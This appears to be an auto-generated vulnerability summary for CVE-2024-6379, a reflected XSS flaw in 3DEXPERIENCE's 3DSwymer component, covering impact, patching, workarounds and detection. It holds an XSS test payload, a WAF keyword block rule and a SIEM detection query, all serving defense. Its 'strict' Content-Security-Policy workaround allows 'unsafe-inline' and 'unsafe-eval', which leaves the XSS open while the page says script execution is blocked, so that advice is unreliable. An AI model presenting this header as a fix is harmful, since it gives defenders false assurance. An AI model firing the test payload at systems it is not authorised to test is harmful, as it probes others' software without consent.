CVE-2024-6379
📋 TL;DR
A reflected Cross-site Scripting (XSS) vulnerability in 3DSwymer component of 3DEXPERIENCE platform allows attackers to inject malicious scripts that execute in users' browsers. This affects organizations using 3DEXPERIENCE releases R2022x through R2024x. Attackers can steal session cookies, redirect users, or perform actions on their behalf.
💻 Affected Systems
- 3DSwymer
- 3DEXPERIENCE Platform
📦 What is this software?
⚠️ Risk & Real-World Impact
Worst Case
Attacker steals administrator session cookies, gains full administrative access to 3DEXPERIENCE platform, exfiltrates sensitive design data, and deploys ransomware across connected systems.
Likely Case
Attacker steals user session cookies to access sensitive design files, modifies engineering data, or redirects users to phishing sites to harvest credentials.
If Mitigated
Script execution blocked by Content Security Policy (CSP), minimal data exposure limited to session information, no privilege escalation possible.
🎯 Exploit Status
Reflected XSS typically requires user interaction (clicking malicious link). No authentication required to trigger the vulnerability.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: Release 3DEXPERIENCE R2024x FP1 or later
Vendor Advisory: https://www.3ds.com/vulnerability/advisories
Restart Required: Yes
Instructions:
1. Download latest patch from Dassault Systèmes support portal. 2. Apply patch following vendor documentation. 3. Restart 3DEXPERIENCE services. 4. Verify patch installation.
🔧 Temporary Workarounds
Web Application Firewall (WAF) Rules
allDeploy WAF rules to block XSS payloads targeting 3DSwymer endpoints
Add WAF rule: Block requests containing <script>, javascript:, or common XSS payloads to /3DSwymer/* endpoints
Content Security Policy (CSP)
allImplement strict CSP headers to prevent script execution from untrusted sources
Add header: Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval'
🧯 If You Can't Patch
- Implement network segmentation to isolate 3DEXPERIENCE systems from internet access
- Deploy browser security controls: Enable Clickjacking protection, disable JavaScript for untrusted sites
🔍 How to Verify
Check if Vulnerable:
Test 3DSwymer endpoints with XSS payloads: <script>alert('XSS')</script> in URL parametersCheck Version:
Check 3DEXPERIENCE administration console or run: cat /var/log/3DS/version.logVerify Fix Applied:
Verify patch version is R2024x FP1 or later and retest XSS payloads show proper sanitization📡 Detection & Monitoring
Log Indicators:
- HTTP requests to 3DSwymer endpoints containing <script> tags
- Unusual parameter values in 3DSwymer URLs
- Multiple failed login attempts followed by script-like requests
Network Indicators:
- Outbound connections to suspicious domains after visiting 3DSwymer URLs
- Unusual data exfiltration patterns from 3DEXPERIENCE servers
SIEM Query:
source="3DSwymer" AND (url="*<script>*" OR url="*javascript:*" OR param="*alert(*")